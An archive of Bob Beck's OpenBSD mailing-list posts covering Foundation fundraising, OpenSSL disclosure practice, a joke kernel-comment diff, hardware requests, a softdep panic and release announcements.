http://www.openbsdfoundation.org/donations.html

If you are attempting to donate a sizable amount of BitCoin, please
bear the limit in mind when donating.. Donations of more than $10000
in value would need to be made over multiple days.

Sorry for any inconvenience, this is just how these things work.

-Bob



Re: OpenSSL vulnerabilities coming on the 19th

2015-03-17 Thread Bob Beck
And while I will reiterate, stop mailing us privately and asking, I
can confirm that the situation has changed, and core LibreSSL
developers have now had disclosure from OpenSSL.   We will be keeping
discussion of all details strictly to that group until such time as
OpenSSL releases publicly.

-Bob


On Mon, Mar 16, 2015 at 2:52 PM, Theo de Raadt dera...@cvs.openbsd.org wrote:
 Please people stop mailing me privately and asking.  (Probably bugging
 other people in the group as well).

 The OpenSSL group do not tell the LibreSSL group about vulnerabilities
 that they are fixing in upcoming releases.

 Why?  Well, they just don't.  That's the whole story.

 Hopefully the LibreSSL team has been aggressive enough at cleaning
 house, and the issue is already resolved in LibreSSL.

 Wait and see.



Re: a thankyou to OpenBSD

2015-02-11 Thread Bob Beck
Wave.. Thanks Diana.

I still owe you a beer or thirteen.

On Tue, Feb 10, 2015 at 5:26 PM, Diana Eichert deich...@wrench.com wrote:
 I don't post much any more, my OpenBSD systems just work.

 Just wanted to post a thank you to OpenBSD because it does
 just work.

 My day job entails a lot of Linux support, lately I've been
 dealing with the big screwup associated with network interface
 naming.  WHY can't Linux follow BSD's straightforward NIC
 naming?  It's positively bizarre all the crappy little files
 and utilities they have come up with so you can munge NIC
 names to something more useful than p3p2!!!.

 In appreciation I just sent in a donation via the OpenBSD
 donation page.

 g.day

 fade to black
 diana



 Past hissy-fits are not a predictor of future hissy-fits.
 Nick Holland(06 Dec 2005)



Re: new OpenSSL flaws

2014-06-05 Thread Bob Beck
We are not on a linux distros mailing list, because we are not a linux
distribution. And this private mailing list is not really an
acknowledged conduit for vulnerability release.

I was asked by someone privately if *I* would be on that mailing list
on June 2nd.

I said I would consider it, but as I felt the list was not being used
for advanced disclosure in a practical means, I didn't see the reason
for it. - but I would be open
to it if it was being used for advanced disclosure.. my words on june
2 ended with:

In a nutshell, I suppose I'm asking you - does this help if the list only gets 
notification at the same time, basically, as public release?

Or are there some rules for participants?

The reply I got said they couldn't give any details because there were
not any - so obviously as of June 2, someone who was on and maintained
that list did
not feel that there was any need to be on the list for advance
disclosure of bugs.

For the record, we didn't get advance notice of Heartbleed either, so
this is nothing new.




On Thu, Jun 5, 2014 at 2:43 PM, Martin, Matthew phy1...@utdallas.edu wrote:
 That's exactly my thought. Especially, because FreeBSD and NetBSD were
 warned, but not OpenBSD. If this was only a rant or any childish
 behavior from them, it's something stupid and, of course, not the right
 thing to do. But hey, we're all human. My real concern is if this is
 something else, a hidden agenda, in that this stupid disclosure was
 indeed, carefully planned. One can never have too many conspiracy
 theories. Especially after what has been happening the last year. Thanks
 for the clarification.

 Mark Cox claims that the reason OpenBSD was not told is because OpenBSD
 is not on the distros mailing list and if we were then they'd be able
 to work with other distros on issues in advance.

 It's at http://oss-security.openwall.org/wiki/mailing-lists/distros .

 Not saying I believe or disbelieve him, but it can't hurt to join even
 if it is only until 5.6 comes out.

 - Matthew Martin



Re: new OpenSSL flaws

2014-06-05 Thread Bob Beck
I may also remind people that those lists are acknowledged right at the top
as experimental.  They also do not allow for non personal subscriptions, so
they aren't very practical for this.  What if I was away for a day or
three..  Or more..  Essentially this is a nice experiment, but not really a
practical means of early disclosure. Nor were we informed it was anything
beyond experimental.
On 5 Jun 2014 17:39, Stuart Henderson s...@spacehopper.org wrote:

 On 2014/06/05 20:43, Martin, Matthew wrote:
   That's exactly my thought. Especially, because FreeBSD and NetBSD were
   warned, but not OpenBSD. If this was only a rant or any childish
   behavior from them, it's something stupid and, of course, not the right
   thing to do. But hey, we're all human. My real concern is if this is
   something else, a hidden agenda, in that this stupid disclosure was
   indeed, carefully planned. One can never have too many conspiracy
   theories. Especially after what has been happening the last year. Thanks
   for the clarification.
 
  Mark Cox claims that the reason OpenBSD was not told is because OpenBSD
  is not on the distros mailing list and if we were then they'd be able
  to work with other distros on issues in advance.

 The distros and linux-distros lists are a good way to contact *some*
 OS distributions and Amazon.

 http://oss-security.openwall.org/wiki/mailing-lists/distros

 But there are clearly a number of others for whom an OpenSSL bug
 would have big impact who are not on that list (OS such as OpenBSD
 and Apple, large scale hosting providers, etc). Many of these are
 listed on the security contacts page on the wiki, and actually, the
 page with information about sending to the distros list (which
 submitters cannot ignore as it has the required pgp key) says:

 Please notify upstream projects/developers of the
 affected software, other affected distro vendors link to
 http://oss-security.openwall.org/wiki/vendors, and/or
 affected Open Source projects before notifying one of these
 mailing lists in order to ensure that these other parties
 are OK with the maximum embargo period that would apply.



Re: panic: softdep_deallocate_dependencies

2014-05-08 Thread Bob Beck
I'll be taking a peek based on what I see in his traceback.  Travelling at
the moment.
On 9 May 2014 06:44, Philip Guenther guent...@gmail.com wrote:

 On Thu, May 8, 2014 at 8:14 PM, STeve Andre' and...@msu.edu wrote:

  On 05/08/14 22:43, Philip Guenther wrote:
 
  On Thu, May 8, 2014 at 2:59 PM, STeve Andre' and...@msu.edu wrote:
 
   Twice now in three or so weeks, I've gotten a panic on my
 -current_amd64
  W500 laptop.  I've updated my tree several times during this time, and
  have
  not seen other problems besides the known acpi heat problem.
 
   Uh, what was the date of the cvs update of your kernel build when they
  started?  What was the cvs update date of your kernel before *that*?
   (I.e,
  what's your best estimate of the window in which the change to the
 kernel
  which triggered the panic occurred?
 
  (What, you don't keep a log of the timestamps of your kernel
  updates+builds?  Doesn't everyone?)
 
 
  Actually, I do keep past kernels so I have the build date for them.
  I *thought* I had some notes on when this started but I am
  ashamed to see that I didn't put them in a safe place.


 Well, make your best, but conservative estimate of the window in which it
 started.  (Certainly after _that_ kernel; not sure if before _this_ kernel
 but certainly before this+1...)

 I have both firefox and chrome running but I'm getting the feeling that
 
  things
  get more weird as I use lots of tabs in chrome.
 
   You're pushing the vm subsystem enough to page.  Since you have 8GB, I
  wonder if you've raised your kern.bufcachepercent, thus pushing on it
  harder.
 
 
  Nope, I try to avoid the knobs when possible.  It's been at 20%
  ever since (bob?) raised it to 20%.
 

 Ok.  I guess it's just memory pressure from chrome.



  I don't think I'm swapping?  At least I haven't seen top tell me that.
 

  ...In the past (like a year+) ago, there were times when chrome
  went crazy with memory and I did swap.  But chrome has gotten
  better--I don't think I've seen it do that for some time now.


 Heh, the backtrace starts from uvm_pageout so yes, it decided to page
 something out.  :-)



   I'm not sure how well I can pin this down.  If I go too far back with
  an older kernel I'll be out of sync with userland.  Any suggestions
  on how to test this more?
 

 I don't recall any kernel ABI changes in the window, but hold off for now.
  Eyes more familiar with the involved subsystem may consider the backtrace
 you gave (thanks!) enough.


 Philip Guenther



Re: OpenBSD Foundation 2014 Fundraising Campaign.

2014-04-11 Thread Bob Beck
On the web site at www.openbsdfoundation.org.

On Fri, Apr 11, 2014 at 10:15 AM, trifle menot trifleme...@gmail.com wrote:
 On 4/10/14, Bob Beck b...@openbsdfoundation.org wrote:

 The Foundation will continue to strive to improve its financial
 resources, and hopes to be able to provide further support to the
 projects in the future. Please continue to contribute!

 Where can I read your financial reports?



OpenBSD Foundation 2014 Fundraising Campaign.

2014-04-10 Thread Bob Beck
The OpenBSD Foundation is happy to report that the $150,000 goal of the 2014
fundraising campaign has been reached. 

We wish to thank our contributors large and small. We will continue
our fundraising efforts both in the current year and next year.

The success of this year's effort has allowed the Foundation to
reverse the recent decline in the support we were able to offer the
OpenBSD project. The Foundation has been able to assume responsibility
for funding more aspects of the project infrastructure, such as the
server electricity bill.

The Foundation is now able to support efforts underway to rebuild a
significant part of the project server infrastructure. This included a
few things that were, literally, rotting.

2014's slate of hackathons has been solidified, ensuring these critical
events will continue to provide a stream of improvements to the OpenBSD
and related projects.

We would like to especially thank the contributors who have made
commitments for continuing donations to the Foundation. Every
recurring regular donation allows us to budget and plan more
effectively.

The Foundation will continue to strive to improve its financial
resources, and hopes to be able to provide further support to the
projects in the future. Please continue to contribute!



Re: OpenBSD Website, multilanguage faq

2014-04-03 Thread Bob Beck
Well if you're going to have your thousand hands, perhaps they could
just do one word at a time, in one language, and pretty soon we'll
morph into something that isn't english and you'll all be a happy
little umama ofebayo

I'll even start, as I looked in the kernel for a phrase to change, and
the only place it appeared happened to be in a file I commit to
regularly, so therefore I'll submit the following kernel change to
start your noble new effort:

Index: kern/vfs_bio.c
===
RCS file: /cvs/src/sys/kern/vfs_bio.c,v
retrieving revision 1.154
diff -u -p -u -p -r1.154 vfs_bio.c
--- kern/vfs_bio.c  25 Jan 2014 04:23:31 -  1.154
+++ kern/vfs_bio.c  4 Apr 2014 00:53:55 -
@@ -856,7 +856,7 @@ incore(struct vnode *vp, daddr_t blkno)

 /*
  * Get a block of requested size that is associated with
- * a given vnode and block offset. If it is found in the
+ * a given vnode and block offset. If it butholakala in the
  * block cache, mark it as having been found, make it busy
  * and return it. Otherwise, return an empty block of the
  * correct size. It is up to the caller to ensure that the
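Review bot: the changed comment line `+ * a given vnode and block offset. If it butholakala in the` replaces the English verb phrase "is found" with a word that is not English, so the comment describing getblk's lookup behaviour no longer reads as a sentence for callers of this function; keep the original wording, or translate the whole comment block consistently rather than a single word.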



Google Summer Of Code 2014.

2014-02-24 Thread Bob Beck
The OpenBSD Foundation is pleased to announce that we have been
accepted as a mentoring organization for Google Summer of Code 2014.
As such if you are a student who qualifies to apply for GSOC, you will
be able to find us in Google's Summer of Code Application process.

We have an ideas page which is located at
http://www.openbsdfoundation.org/gsoc2014.html

I will repeat my usual disclaimer here on behalf of the foundation -
doing anything with GSOC does *not* guarantee the result will end up
in OpenBSD or any related project. That having been said
we hope to be able to put some mentors together with students to
accomplish things that may become useful to the community at large.

This will be our first year doing this, so we hope to learn from the
experience and see if it will work out in future years.

-Bob Beck - The OpenBSD Foundation.



asdasd

2014-01-20 Thread Bob Beck
Greetings All,

About a week ago I warned you all that the OpenBSD project did not
have the funds to cover our bills for the past year (especially the
ability to handle the electricity) and that our funding sources were
not sustainable.

As most of you know the news of our predicament has been widely
distributed over the last week, and the response from the community as
well as corporate donors has been significant - some of this response
has been hitting the internet media already.

To all of you who have donated, please allow me to give you a huge
Thank You.  In a nutshell, we have in one week gone from being in a
dire situation to having a commitment of approximately $100,000 in
donations to the foundation. From a developer's perspective let me
assure you that this reaffirms the worth of what we are supporting and
makes us want to work on it that much more.

We would like to continue to build on your groundswell of support, and
have set a target for $150,000 this year in fundraising.  Please see

http://www.openbsdfoundation.org/campaign2104.html

If you have contributed already - Thank you!
If you can help us by contributing - Please do.
If you know or work for someone who can help us reach our goals,
please contact us.

Sincerely,

-Bob



OpenBSD Foundation Fundraising for 2014

2014-01-20 Thread Bob Beck
Greetings All,

About a week ago I warned you all that the OpenBSD project did not
have the funds to cover our bills for the past year (especially the
ability to handle the electricity) and that our funding sources were
not sustainable.

As most of you know the news of our predicament has been widely
distributed over the last week, and the response from the community as
well as corporate donors has been significant - some of this response
has been hitting the internet media already.

To all of you who have donated, please allow me to give you a huge
Thank You.  In a nutshell, we have in one week gone from being in a
dire situation to having a commitment of approximately $100,000 in
donations to the foundation. From a developer's perspective let me
assure you that this reaffirms the worth of what we are supporting and
makes us want to work on it that much more.

We would like to continue to build on your groundswell of support, and
have set a target for $150,000 this year in fundraising.  Please see

http://www.openbsdfoundation.org/campaign2104.html

If you have contributed already - Thank you.
If you can help us by contributing - Please do.
If you know or work for someone who can help us reach our goals,
please contact us.

Sincerely,

-Bob



Re: Request for Funding our Electricity

2014-01-16 Thread Bob Beck
On Thu, Jan 16, 2014 at 10:58 AM, Daniel Cegiełka
daniel.cegie...@gmail.com wrote:

 Another example: Google will pay even more than $3000 for finding an
 error in OpenSSH (Core infrastructure network services) - do they know
 about your problems?

 http://googleonlinesecurity.blogspot.com/2013/10/going-beyond-vulnerability-rewards.html

 Daniel


Yes, we're aware of that program.  However it still comes down to a
bounty for bugfixes or change of some sort, so it's not a source of
sustainable funding, unless we were to do something like introduce an
annual quota of bugs and convincing looking churn for the sake of
finding them every year. Would you want to depend upon software in your
infrastructure that we were doing that to?



Re: Request for Funding our Electricity

2014-01-15 Thread Bob Beck
Yes, I believe so - and we'll be ramping that up shortly, but
realistically the need is for donations in general - electricity is one
thing that the funding can be applied to.

On Wed, Jan 15, 2014 at 3:27 AM, Luca Ferrari fluca1...@infinito.it wrote:
 On Tue, Jan 14, 2014 at 9:18 PM, Bob Beck b...@openbsdfoundation.org wrote:
 And actually, if you're reading this, you can help by passing this on
 to people you know *off these lists*.

 Is it worth to post a call for support on the official website
 front-page (and the foundation one too)? Just to emphasize the need
 for electricity now.

 Luca



Re: Request for Funding our Electricity

2014-01-14 Thread Bob Beck
   Just to bring this issue back to the forefront.

In light of shrinking funding, we do need to look for a source to
cover project expenses.  If need be the OpenBSD Foundation can be
involved in receiving donations to cover project electrical costs.

But the fact is right now, OpenBSD will shut down if we do not have
the funding to keep the lights on.

If you or a company you know are able to assist us, it would be
greatly appreciated, but right now we are looking at a significant
funding shortfall for the upcoming year - Meaning the project won't be
able to cover 20 thousand dollars in electrical expenses before being
able to use money for other things. That sort of situation is not
sustainable.




On Fri, Dec 20, 2013 at 5:08 PM, Theo de Raadt dera...@cvs.openbsd.org wrote:
 I am resending this request for funding our electricity bills because
 it is not yet resolved.

 We really need even more funding beyond that, because otherwise all of
 this is simply unsustainable.  This request is the smallest we can
 make.

 ---

 Hi everyone.

 The OpenBSD project uses a lot of electricity for running the
 development and build machines.  A number of logistical reasons
 prevents us from moving the machines to another location which might
 offer space/power for free, so let's not allow the conversation to go
 that way.

 We are looking for a Canadian company who will take on our electrical
 expenses -- on their books, rather than on our books.  We would be
 happiest to find someone who will do this on an annual recurring
 basis.

 That way the various OpenBSD efforts can be supported, yet written off
 as an off-site operations cost by such a company.  If we reduce this
 cost, it will leave more money for other parts of the project.

 We think that a Canadian company is the best choice for accounting
 reasons.  If a company in some other jurisdiction feels they can also
 do this successfully, we'd be very happy to hear from them as well.

 I am not going to disclose the actual numbers here.  Please contact me
 for details if serious.

 Thanks.



Re: Request for Funding our Electricity

2014-01-14 Thread Bob Beck
And actually, if you're reading this, you can help by passing this on
to people you know *off these lists*.

When we post to these mailing lists saying these things we are asking
for your help to get the word out to people who support open source
projects. Those people are not necessarily here, and often, you (the
people who use it and work with it) need to make the case to them that
their support is important - far better that explanation comes from you
rather than someone they don't know.

-Bob


On Tue, Jan 14, 2014 at 1:03 PM, Bob Beck b...@openbsdfoundation.org wrote:
Just to bring this issue back to the forefront.

 In light of shrinking funding, we do need to look for a source to
 cover project expenses.  If need be the OpenBSD Foundation can be
 involved in receiving donations to cover project electrical costs.

 But the fact is right now, OpenBSD will shut down if we do not have
 the funding to keep the lights on.

 If you or a company you know are able to assist us, it would be
 greatly appreciated, but right now we are looking at a significant
 funding shortfall for the upcoming year - Meaning the project won't be
 able to cover 20 thousand dollars in electrical expenses before being
 able to use money for other things. That sort of situation is not
 sustainable.




 On Fri, Dec 20, 2013 at 5:08 PM, Theo de Raadt dera...@cvs.openbsd.org 
 wrote:
 I am resending this request for funding our electricity bills because
 it is not yet resolved.

 We really need even more funding beyond that, because otherwise all of
 this is simply unsustainable.  This request is the smallest we can
 make.

 ---

 Hi everyone.

 The OpenBSD project uses a lot of electricity for running the
 development and build machines.  A number of logistical reasons
 prevents us from moving the machines to another location which might
 offer space/power for free, so let's not allow the conversation to go
 that way.

 We are looking for a Canadian company who will take on our electrical
 expenses -- on their books, rather than on our books.  We would be
 happiest to find someone who will do this on an annual recurring
 basis.

 That way the various OpenBSD efforts can be supported, yet written off
 as an off-site operations cost by such a company.  If we reduce this
 cost, it will leave more money for other parts of the project.

 We think that a Canadian company is the best choice for accounting
 reasons.  If a company in some other jurisdiction feels they can also
 do this successfully, we'd be very happy to hear from them as well.

 I am not going to disclose the actual numbers here.  Please contact me
 for details if serious.

 Thanks.



Re: Request for Funding our Electricity

2014-01-14 Thread Bob Beck
Kiril, a dedicated one purpose bank account or officially directed
donations are somewhat problematic to a Canadian not for profit -
Normally for expenses the foundation supports we simply reimburse the
individuals for their costs from our funds.

As far as the suggested donation meter that's an idea we'd probably
like to put up - as it gets that crowdsourcing type interest going. But
in this case it would likely not be 20K, more like a 150K yearly goal
would be best.


On Tue, Jan 14, 2014 at 2:16 PM, Kirill Bychkov ki...@linklevel.net wrote:
 On Wed, January 15, 2014 00:03, Bob Beck wrote:
Just to bring this issue back to the forefront.

 In light of shrinking funding, we do need to look for a source to
 cover project expenses.  If need be the OpenBSD Foundation can be
 involved in receiving donations to cover project electrical costs.

 But the fact is right now, OpenBSD will shut down if we do not have
 the funding to keep the lights on.

 If you or a company you know are able to assist us, it would be
 greatly appreciated, but right now we are looking at a significant
 funding shortfall for the upcoming year - Meaning the project won't be
 able to cover 20 thousand dollars in electrical expenses before being
 able to use money for other things. That sort of situation is not
 sustainable.


 Hi. Could we collect this sum on a special bank account, to gather the correct sum
 for covering electricity expenses?
 Or will the OpenBSD Foundation pay the bill from its funds?
 Simpler - should I send money to the Foundation right now or should I wait for info
 about a direct-electricity-expenses-account? Unfortunately I can't send $20k,
 but if 200 community members send $100 each...
 I hope this will help to have another year for searching for the company Theo was
 mentioning in his first letter.



 On Fri, Dec 20, 2013 at 5:08 PM, Theo de Raadt dera...@cvs.openbsd.org
 wrote:
 I am resending this request for funding our electricity bills because
 it is not yet resolved.

 We really need even more funding beyond that, because otherwise all of
 this is simply unsustainable.  This request is the smallest we can
 make.

 ---

 Hi everyone.

 The OpenBSD project uses a lot of electricity for running the
 development and build machines.  A number of logistical reasons
 prevents us from moving the machines to another location which might
 offer space/power for free, so let's not allow the conversation to go
 that way.

 We are looking for a Canadian company who will take on our electrical
 expenses -- on their books, rather than on our books.  We would be
 happiest to find someone who will do this on an annual recurring
 basis.

 That way the various OpenBSD efforts can be supported, yet written off
 as an off-site operations cost by such a company.  If we reduce this
 cost, it will leave more money for other parts of the project.

 We think that a Canadian company is the best choice for accounting
 reasons.  If a company in some other jurisdiction feels they can also
 do this successfully, we'd be very happy to hear from them as well.

 I am not going to disclose the actual numbers here.  Please contact me
 for details if serious.

 Thanks.



The OpenBSD Foundation now accepts BitCoin donations...

2013-11-26 Thread Bob Beck
I'm happy to announce the OpenBSD foundation can now accept donations
to assist in funding project activities in BTC.

We are using BitPay.com to host our BitCoin donations, which are converted
to CAD for use by the project.

If you have been interested in making donations in BitCoin, please visit
http://www.openbsdfoundation.org/donations.html, and visit the BitCoin
donation link at the bottom of the page.


Thanks,

-Bob



Re: softdep issue in 5.3-current ?

2013-06-26 Thread Bob Beck
Update to something that has version 1.27 of sys/kern/vfs_biomem.c and tell
me if you still have the issue.

On Wed, Jun 26, 2013 at 4:35 AM, Tori Mus torimus...@gmail.com wrote:
 Hi,

 I'm running a current snapshot of OpenBSD on the amd64 architecture, MP kernel
 (Lenovo Thinkpad to be concrete). Based on the official docs I tried to tune
 disk performance by adding the `softdep' mounting option for ffs slices.

 After updating /etc/fstab and a clean reboot, I checked that all particular
 slices like /home, /usr etc. are really mounted with softdep.

 The issue is much worse performance than with the default nosoftdep.
 Now, for example, when extracting the ports.tar.gz snapshot in /usr, other
 processes can't open even small files without very long delays: vi
 $HOME/.profile takes about 2 minutes whereas cpu usage shown with top is
 about 5% only! Turning off softdep brings the access time of the
 previous example back to about 4 seconds.

 I've searched the mailing lists and read about a softdep regression on OpenBSD
 4.8 that was later fixed. Is this regression back? Does anybody else
 experience similar behaviour?



Still looking for 1U servers in western canada.

2013-06-10 Thread Bob Beck
I'm still looking for 1U servers in western Canada. We have an
opportunity to build a better build infrastructure for ports but need
the gear to do it with.

I would be keenly interested in

1) Workable semi-modern amd64 capable Intel hardware, 1U - 4 GB of ram
or more is nice, one disk drive (more is nice too). Needs a working
serial port for serial console.
Would be very nice to get 10 or so of these for parallel dpb infrastructure.

2) Sparc64 based 1U machines such as Sun V210 or V215, similar to the above needs.

If they have rails for rack mounting that's even better.

They're needed in Edmonton, Alberta - where we have a nice place to host them.



Call for support to continue Radeon KMS work...

2013-06-02 Thread Bob Beck
Some of you may be aware of the recent developments in current that
have brought us Intel KMS Support. With this we get proper
accelerated X on current and future Intel graphics hardware. There
are a few other nice side benefits to this work:

 - We gain the ability to use the kernel debugger and get debugging
information when the system panics when you are in X windows. 

 - This also provides support for modern graphics outputs like HDMI
and DisplayPort. 

Work on this was largely done by Jonathan Gray (jsg@), and was
supported by a generous sponsorship from M:Tier
(http://www.mtier.org), and by funds from the OpenBSD Foundation. We
would especially like to thank M:Tier at this time for that support. 

We would like to extend this work to support the ATI/AMD Radeon
graphics hardware. To this end the Foundation as well as M:Tier have
committed to support Jonathan to continue the work done for Intel and
extend it to the Radeon platform. Jonathan has started this work and
basic KMS support is already working - however there is still a lot to
do. 

As of this time the Foundation lacks sufficient funds to follow this
work through to completion. To that end, we are actively looking for a
company or companies that could commit to supporting these efforts so
that Radeon KMS support may be completed.  We are looking for a total
sponsorship goal of approximately $40,000.  If you or your company can
help with these efforts, please contact the OpenBSD Foundation
(http://www.openbsdfoundation.org). We can either accept your
donations directly or make other arrangements. 

Thank you,

-Bob



Need for modern i386/amd64 machines in Edmonton AB.

2013-03-19 Thread Bob Beck
The project is looking for some modern i386/amd64 machines in
Edmonton, AB. They need to be relatively recent, and rack mountable. Ideally
they should have rails, or the ability to find rack mount rails for them. 

1U is best, ideally something that runs OpenBSD well. 

We're trying to use this to expand and beef up our ports building
infrastructure, to reduce port build latencies and reduce associated
costs to the project.

If you have something that could be gotten to us in Edmonton, or
nearby, please let me know the details.  

Thanks
-Bob



CD ordering problems in the last day or so fixed.

2012-11-15 Thread Bob Beck
   The https.openbsd.org machines were under a denial of service attack
originating from LeaseWeb USA and LeaseWeb Netherlands:

Their nets have now been filtered and you should be able to
order again. Thank you to those who dropped me a note. 

-Bob

If you know anyone here you could tell them if they care. The attack originated
from multiple IPs on both their USA and Netherlands networks.





OpenBSD 5.2 Released

2012-11-01 Thread Bob Beck
.  Those who did not support us financially have still helped
us with our goal of improving the quality of the software.

Our developers are:

Aaron Bieber, Alexander Bluhm, Alexander Hall, Alexander Schrijver,
Alexander Yurchenko, Alexandr Shadchin, Alexandre Ratchov,
Anil Madhavapeddy, Anthony J. Bentley, Antoine Jacoutot,
Austin Hook, Benoit Lecocq, Bob Beck, Brandon Mercer, Bret Lambert,
Brett Mahar, Bryan Steele, Camiel Dobbelaar, Can Erkin Acar,
Charles Longeau, Christian Weisgerber, Christiano F. Haesbaert,
Claudio Jeker, Damien Bergamini, Damien Miller, Darren Tucker,
David Coppa, David Gwynne, David Krause, Edd Barrett, Eric Faurot,
Federico G. Schwindt, Felix Kronlage, Gilles Chehade,
Giovanni Bechis, Gleydson Soares, Gonzalo L. Rodriguez,
Henning Brauer, Ian Darwin, Igor Sobrado, Ingo Schwarze,
Jakob Schlyter, Janne Johansson, Jason George, Jason McIntyre,
Jasper Lievisse Adriaanse, Jeremy Evans, Jim Razmus II, Joel Knight,
Joel Sing, Joerg Zinke, Jolan Luff, Jonathan Armani, Jonathan Gray,
Jonathan Matthew, Jordan Hargrave, Joshua Elsasser, Joshua Stein,
Kenji Aoyama, Kenneth R Westerback, Kirill Bychkov, Kurt Miller,
Landry Breuil, Laurent Fanis, Lawrence Teo, Luke Tymowski,
Marc Espie, Marco Pfatschbacher, Marcus Glocker, Mark Kettenis,
Mark Lumsden, Markus Friedl, Martin Pieuchot, Martynas Venckus,
Mats O Jansson, Matthew Dempsky, Matthias Kilian, Matthieu Herrb,
Michael Erdely, Mike Belopuhov, Mike Larkin, Miod Vallat,
Nayden Markatchev, Nicholas Marriott, Nick Holland, Nigel Taylor,
Okan Demirmen, Otto Moerbeek, Pascal Stumpf, Paul de Weerd,
Paul Irofti, Peter Hessler, Peter Valchev, Philip Guenther,
Pierre-Emmanuel Andre, Pierre-Yves Ritschard, Remi Pointel,
Robert Nagy, Ryan Freeman, Ryan Thomas McBride, Sasano,
Sebastian Benoit, Sebastian Reitenbach, Simon Perreault,
Stefan Sperling, Stephan A. Rickauer, Steven Mestdagh,
Stuart Cassoff, Stuart Henderson, Takuya Asada, Ted Unangst,
Theo de Raadt, Tobias Stoeckmann, Tobias Weingartner,
Todd C. Miller, Todd Fries, Will Maier, William Yodlowsky,
Yasuoka Masahiko, Yojiro Uo



ftp/www.openbsd.org downtime today. don't panic

2012-10-12 Thread Bob Beck
Hi Folks,

The main web, ftp, and anoncvs servers are going to be down for a
short period today while they move from data center to data center at
the University of Alberta.  The University has been so kind as to
offer the project space in two racks in their new state of the art
data centre in a new building, and we are moving equipment into the
new place.  We will minimize the downtime as much as possible, but it
will be for a short while (likely an hour or so) as we pick up the
gear and move it.  Please don't panic.

Thanks,

-Bob



Re: quick query.

2012-10-10 Thread Bob Beck
It is for me

#export PKG_PATH=http://ftp.openbsd.org/pub/OpenBSD/snapshots/packages/amd64
# pkg_add tor
tor-0.2.2.39: ok
The following new rcscripts were installed: /etc/rc.d/tor
See rc.d(8) for details.
# pkg_info tor
Information for inst:tor-0.2.2.39

Comment:
anonymity service using onion routing

Description:
Tor is a connection-based low-latency anonymous communication system that
protects TCP streams: web browsing, instant messaging, irc, ssh, etc.

Maintainer: Pascal Stumpf pascal.stu...@cubes.de

WWW: http://www.torproject.org/



Looks like PEBKAC.


On Wed, Oct 10, 2012 at 4:48 PM, sharon dvir bpmcont...@gmail.com wrote:
 it looks like Tor just isn't there.
 which means that in order to go from 2.2.35 to 2.2.39 i'll have to compile
 it manually.
 which is no problem, but hence a need for the tool i originally asked
 about.
 or am i missing something?
 BTW, 2.2.39 fixes some remote exploits for Tor, in case anyone is running
 it.
 thanks everyone.

 On 10 October 2012 18:09, Peter N. M. Hansteen pe...@bsdly.net wrote:

 Martin Pelikan martin.peli...@gmail.com writes:

  as sthen@ kindly corrected me the some time ago, we now have
  pkg.conf(5) and installpath.

 You're right of course -- pkg.conf has been with us for a while (first
 appearance in 4.8 it seems).

  This way it'll work even if you don't invoke package updates from your
  shell, but using some kind of remote administration software for
  example.

 Yes. That functionality would be relevant to the OP. I'd managed to
 forget all about it, probably because the old .profile trick works so
 well in other contexts.

 - P

 --
 Peter N. M. Hansteen, member of the first RFC 1149 implementation team
 http://bsdly.blogspot.com/ http://www.bsdly.net/ http://www.nuug.no/
 Remember to set the evil bit on all malicious network traffic
 delilah spamd[29949]: 85.152.224.147: disconnected after 42673 seconds.



OpenBSD 5.2 song - and pre-orders for 5.2!

2012-10-06 Thread Bob Beck
We have made available the song that will come out
with the 5.2 release. The song and details of it are linked
from:

http://openbsd.org/lyrics.html

Go have a look and a listen!

The details for the upcoming 5.2 release are available at

http://www.openbsd.org/52.html

A reminder to you all that pre-orders for 5.2 can be made
by starting from:

http://openbsd.org/orders.html

Please consider buying a CD or three.  Sales of CDs and merchandise
are vital to OpenBSD's continued existence.  It is only this revenue stream
that keeps the power and air conditioning on, and keeps us all hacking.

   Thanks!



Re: OpenBSD - UEFI Secure Boot

2012-07-07 Thread Bob Beck
On Sat, Jul 7, 2012 at 11:25 AM, Tomas Bodzar tomas.bod...@gmail.com wrote:


 World is trying much worse stuff than UEFI

 http://extratorrent.com/article/2263/uk+prime+minister+calls+for+online+porn+ban.html



What? they're going to ban porn? That's it, I'm quitting the internets.



OpenBSD 5.1 released May 1, 2012

2012-05-01 Thread Bob Beck
.  The 5.1 ports collection,
including many of the distribution files, is included on the 3-CD
set.  Please see the PORTS file for more information.

Note: some of the most popular ports, e.g., the Apache web server
and several X applications, come standard with OpenBSD.  Also, many
popular ports have been pre-compiled for those who do not desire
to build their own binaries (see BINARY PACKAGES, below).
A large number of binary packages are provided.  Please see the PACKAGES
file (ftp://ftp.OpenBSD.org/pub/OpenBSD/5.1/PACKAGES) for more details.
The CD-ROMs contain source code for all the subsystems explained
above, and the README (ftp://ftp.OpenBSD.org/pub/OpenBSD/5.1/README)
file explains how to deal with these source files.  For those who
are doing an FTP install, the source code for all four subsystems
can be found in the pub/OpenBSD/5.1/ directory:

xenocara.tar.gz ports.tar.gz   src.tar.gz sys.tar.gz
Ports tree and package building by Jasper Lievisse Adriaanse,
Landry Breuil, Michael Erdely, Stuart Henderson, Peter Hessler,
Paul Irofti, Antoine Jacoutot, Robert Nagy, and Christian Weisgerber.
System builds by Theo de Raadt, Mark Kettenis, and Miod Vallat.
X11 builds by Todd Fries and Miod Vallat.  ISO-9660 filesystem
layout by Theo de Raadt.

We would like to thank all of the people who sent in bug reports, bug
fixes, donation cheques, and hardware that we use.  We would also like
to thank those who pre-ordered the 5.1 CD-ROM or bought our previous
CD-ROMs.  Those who did not support us financially have still helped
us with our goal of improving the quality of the software.

Our developers are:

Alexander Bluhm, Alexander Hall, Alexander Schrijver,
Alexander Yurchenko, Alexandr Shadchin, Alexandre Ratchov,
Anil Madhavapeddy, Anthony J. Bentley, Antoine Jacoutot,
Ariane van der Steldt, Austin Hook, Benoit Lecocq, Bernd Ahlers,
Bob Beck, Bret Lambert, Bryan Steele, Camiel Dobbelaar,
Can Erkin Acar, Charles Longeau, Chris Kuethe, Christian Weisgerber,
Christiano F. Haesbaert, Claudio Jeker, Dale Rahn, Damien Bergamini,
Damien Miller, Darren Tucker, David Coppa, David Gwynne, David Hill,
David Krause, Edd Barrett, Eric Faurot, Federico G. Schwindt,
Felix Kronlage, Gilles Chehade, Giovanni Bechis, Gleydson Soares,
Henning Brauer, Ian Darwin, Igor Sobrado, Ingo Schwarze,
Jacek Masiulaniec, Jakob Schlyter, Janne Johansson, Jason George,
Jason McIntyre, Jason Meltzer, Jasper Lievisse Adriaanse,
Jeremy Evans, Jim Razmus II, Joel Knight, Joel Sing, Joerg Zinke,
Jolan Luff, Jonathan Armani, Jonathan Gray, Jonathan Matthew,
